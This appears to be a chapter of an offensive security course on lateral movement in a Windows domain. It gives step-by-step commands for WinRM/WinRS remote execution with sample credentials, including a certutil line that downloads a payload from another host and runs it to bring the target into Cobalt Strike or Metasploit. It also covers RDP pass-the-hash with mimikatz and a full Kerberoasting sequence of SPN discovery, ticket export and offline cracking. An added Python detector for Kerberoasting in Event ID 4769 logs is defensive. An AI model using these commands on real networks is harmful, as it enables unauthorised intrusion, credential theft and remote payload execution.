Chapter content
IPC, WMI, SMB, PTH, PTK, PTT, SPN, WinRM, WinRS, RDP, Plink, DCOM, SSH; Exchange, LLMNR poisoning, Kerberos TGS, GPO & DACL, domain controller privilege escalation vulnerabilities, constrained delegation, database attack and defense, system patch delivery and execution, EDR targeted delivery and execution, etc.
Domain Lateral Movement - WinRM & WinRS - Cleartext & NTLM
Using the WinRM service, connecting with WinRS
WinRM, which stands for Windows Remote Management, is a service that allows administrators to perform system management tasks remotely.
Kerberos and NTLM authentication as well as Basic authentication are supported by default.
Lateral movement conditions: the WinRM/WinRS service must be enabled on both sides.
Administrator-level credentials are required to use this service.
On Windows Server 2008 and later the WinRM service starts automatically by default; on Windows Vista/Win7 it must be started manually.
Windows Server 2012 and later allow remote management from arbitrary hosts by default.
Enable on the attacking machine (TrustedHosts="*" turns off the client-side host check for non-Kerberos authentication, so the client will connect to any host):
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
1. Probe availability:
cs built-in port scan 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
2. Connection execution:
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami
3. Bring the host online in CS & MSF:
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe webserver4444.exe & webserver4444.exe"
4. CS built-in lateral movement plugin
Domain Lateral Movement - RDP - Cleartext & NTLM
Remote Desktop Services supports cleartext and hash-based connections
Condition: the target has the Remote Desktop (RDP) service enabled
RDP connection methods:
- Connect directly from the currently controlled host (e.g. RDP to the SQL server directly from the web server)
- Set up a pivot node and connect through it (using a proxy tool) (recommended)
- Port forwarding (forward the SQL server's port 3389 to port 2222 on the web server; a tool must be uploaded)
1. Probe the service:
cs built-in port scan 3389
tasklist /svc | find "TermService" # find the PID of the service process
netstat -ano | find "PID value" # find the port number bound by that PID
portscan 192.168.3.0-192.168.3.255 3389 arp 1024
2. Probe credentials:
CrackMapExec & MSF batch scans for username/password verification
3. Connection execution:
Cleartext connection:
mstsc /console /v:192.168.3.32 /admin
Hash connection:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin" # mimikatz connects using the hash (requires Restricted Admin mode on the target)
Domain Lateral Movement - Spn & Kerberos - Request & Crack & Rewrite
Kerberoasting attack flow:
• SPN service discovery
• Request service tickets (with a tool, or with a PowerShell script)
• Export the service tickets (mimikatz export)
• Brute-force the service tickets offline (crack the RC4-encrypted ticket with a password dictionary)
https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html
Exploitation depends on the ticket encryption type configured by policy (compare the two cases described below).
An attacker with a valid domain user's authentication ticket (TGT) can request service tickets for one or more target services running on a server.
The DC looks up the SPN in Active Directory and encrypts the ticket with the key of the service account associated with that SPN, so the service can verify that the user has access.
When the requested Kerberos service ticket uses encryption type RC4_HMAC_MD5, the service account's NTLM password hash is the key used to encrypt the service ticket.
The attacker cracks the received TGS ticket offline to recover the target service account's hash (and, via the dictionary, its password). This is called a Kerberoasting attack.
If an arbitrary SPN is registered on a domain user account, the NTLM hash of that user's plaintext password is used to create the service ticket, which makes it crackable with a wordlist.
1. Scan for SPNs and the services exposed by hosts in the environment:
powershell setspn -T God.org -q */*
powershell setspn -T God.org -q */* | findstr "MSSQL"
2. Request service tickets - tool: one-to-many request, automatically requesting tickets for SPN hosts in the domain
https://github.com/GhostPack/Rubeus
Rubeus kerberoast
3. Request service tickets - manual: point-to-point request, producing a ticket file after the request
powershell Add-Type -AssemblyName System.IdentityModel
powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/fileserv.god.org:1433"
mimikatz kerberos::ask /target:MSSQLSvc/fileserv.god.org:1433
4. Export:
mimikatz kerberos::list /export
5. Crack:
# Only RC4-encrypted tickets can be cracked; uses the pass.txt dictionary
python3 tgsrepcrack.py pass.txt "0-40e00000-webserver$@krbtgt~GOD.ORG-GOD.ORG.kirbi"
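From the defender's side, the RC4 property described above and the one-to-many request pattern of the Rubeus step are what make Kerberoasting visible in Event ID 4769 on the domain controller. The following added detection example (not part of the original notes, and not tied to any real tool) runs over constructed 4769 records reduced to the fields that matter: it flags RC4 tickets issued for non-machine, non-krbtgt service accounts, then groups them by client to catch a burst of distinct services requested in a short window. Field names, timestamps and addresses are assumptions.

```python
from collections import defaultdict

# Constructed sample of Event ID 4769 records (Kerberos service ticket
# requested), reduced to the relevant fields. Not real log data.
SAMPLE_4769 = [
    {"time": 1000, "client": "10.0.0.5", "account": "jdoe@GOD.ORG",
     "service": "MSSQLSvc", "enc": "0x17", "status": "0x0"},
    {"time": 1002, "client": "10.0.0.5", "account": "jdoe@GOD.ORG",
     "service": "svc_http", "enc": "0x17", "status": "0x0"},
    {"time": 1003, "client": "10.0.0.5", "account": "jdoe@GOD.ORG",
     "service": "svc_backup", "enc": "0x17", "status": "0x0"},
    {"time": 1500, "client": "10.0.0.9", "account": "alice@GOD.ORG",
     "service": "FILESERV$", "enc": "0x12", "status": "0x0"},
    {"time": 1600, "client": "10.0.0.9", "account": "alice@GOD.ORG",
     "service": "krbtgt", "enc": "0x12", "status": "0x0"},
]

# Kerberos etype 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP; 0x12 is AES256.
RC4_ETYPES = {"0x17", "0x18"}


def is_crackable_request(ev):
    """True for a successfully issued RC4 ticket whose service account is a
    user account (not a machine account ending in '$' and not krbtgt): the
    case the page describes, where the ticket is keyed by the account's NTLM
    hash and can be attacked offline with a wordlist."""
    svc = ev["service"]
    return (ev["enc"].lower() in RC4_ETYPES
            and ev["status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_kerberoast_bursts(events, window=60, min_services=3):
    """Return one alert per client that obtained crackable tickets for at
    least `min_services` distinct service accounts within `window` seconds,
    the signature of a one-to-many request by a Kerberoasting tool."""
    by_client = defaultdict(list)
    for ev in events:
        if is_crackable_request(ev):
            by_client[ev["client"]].append(ev)
    alerts = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            seen = {e["service"] for e in evs[i:]
                    if e["time"] - first["time"] <= window}
            if len(seen) >= min_services:
                alerts.append({"client": client, "account": first["account"],
                               "services": sorted(seen)})
                break  # one alert per client is enough for triage
    return alerts
```

The thresholds are starting points; a single RC4 ticket for a user service account is already worth a look in an environment that has moved its service accounts to AES.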